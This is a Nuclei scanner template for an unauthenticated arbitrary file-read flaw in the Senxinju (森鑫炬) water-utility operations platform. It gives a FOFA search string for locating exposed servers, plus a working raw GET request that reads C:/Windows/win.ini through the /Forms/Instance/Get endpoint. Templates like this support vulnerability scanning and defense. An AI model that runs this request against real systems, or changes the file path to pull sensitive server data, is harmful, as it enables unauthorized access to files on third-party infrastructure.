id: senxinju-Instance_Get-File-reading

info:
  name: 森鑫炬水务企业综合运营平台 Instance/Get 任意文件读取漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: title="森鑫炬水务企业综合运营平台 - S8" || (body="Content/easyui.css" && body="重庆森鑫炬科技有限公司")
    森鑫炬水务企业综合运营平台 Instance/Get 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
  reference:
    - https://mp.weixin.qq.com/s/FyzAVvP2d4GqQY0HovzXKA
  tags: File reading

http:
  - raw:
      - |
        GET /Forms/Instance/Get?file=C:/Windows/win.ini HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '; for 16-bit app support'
        condition: and
      - type: status
        status: 
          - 200